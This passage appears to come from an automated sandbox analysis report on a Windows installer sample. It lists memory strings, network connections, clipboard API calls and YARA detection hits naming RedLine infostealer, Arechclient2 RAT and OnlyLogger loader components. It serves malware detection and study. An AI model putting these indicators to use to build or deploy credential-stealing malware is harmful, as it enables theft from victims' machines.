                  Source: explorer.exe, 0000002F.00000002.4182753346.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                  Source: explorer.exe, 0000002F.00000002.4182753346.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                  Source: explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60032 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60017 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60062
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59942
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59988
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60058
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60071 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60012
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60026 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60054
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59991
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60096
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59942 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60087 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60017
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60012 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59969 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59994 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60037 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60058 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60062 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60083 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60121 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60041 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60054 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60071
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59998
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60075 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59953
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60026
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59983 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59963
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59962
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60067
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60100
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59962 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60021
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60108
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60029
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60104
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59991 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59969
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59953 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60092 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60096 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59972
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60037
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60108 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60112
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60032
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60050 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60075
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59963 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59940 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59998 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60104 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60100 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60117 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60008 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59975 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60004 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59988 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60092
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59978
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60004
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60046 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60046
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59940
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60000 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60021 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60121
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60041
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60029 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60067 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59978 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60080 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60008
                  Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49736 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:59963 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_004056E3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E3

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 19.0.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.320451a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.320451a.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31d6d4a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: setup_installer.exe PID: 7608, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17c604381c7047e.exe PID: 7940, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, type: DROPPED
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.17e0e50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.3.Mon1785436ae78.exe.1880000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.3.Mon1785436ae78.exe.1880000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.17e0e50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 22.0.Mon178817e243.exe.e60000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 26.2.Mon1785436ae78.exe.17e0e50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects OnlyLogger loader variants Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 26.3.Mon1785436ae78.exe.1880000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects OnlyLogger loader variants Author: ditekSHen
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 26.3.Mon1785436ae78.exe.1880000.0.unpack, type: UNPACKEDPEMatched rule: Detects OnlyLogger loader variants Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 1.3.setup_installer.exe.30bf192.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                  Source: 2.2.setup_install.exe.6b280000.2.unpack, type: UNPACKEDPEMatched rule: Detects unknown loader / injector Author: ditekSHen
                  Source: 1.3.setup_installer.exe.2f30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects unknown loader / injector Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.17f0e50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.3.Mon179e1058f256.exe.3140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 1.3.setup_installer.exe.2f66740.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects unknown loader / injector Author: ditekSHen
                  Source: 26.2.Mon1785436ae78.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects OnlyLogger loader variants Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                  Source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 1.3.setup_installer.exe.2f8e26e.10.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 26.2.Mon1785436ae78.exe.17e0e50.1.unpack, type: UNPACKEDPEMatched rule: Detects OnlyLogger loader variants Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 26.2.Mon1785436ae78.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects OnlyLogger loader variants Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
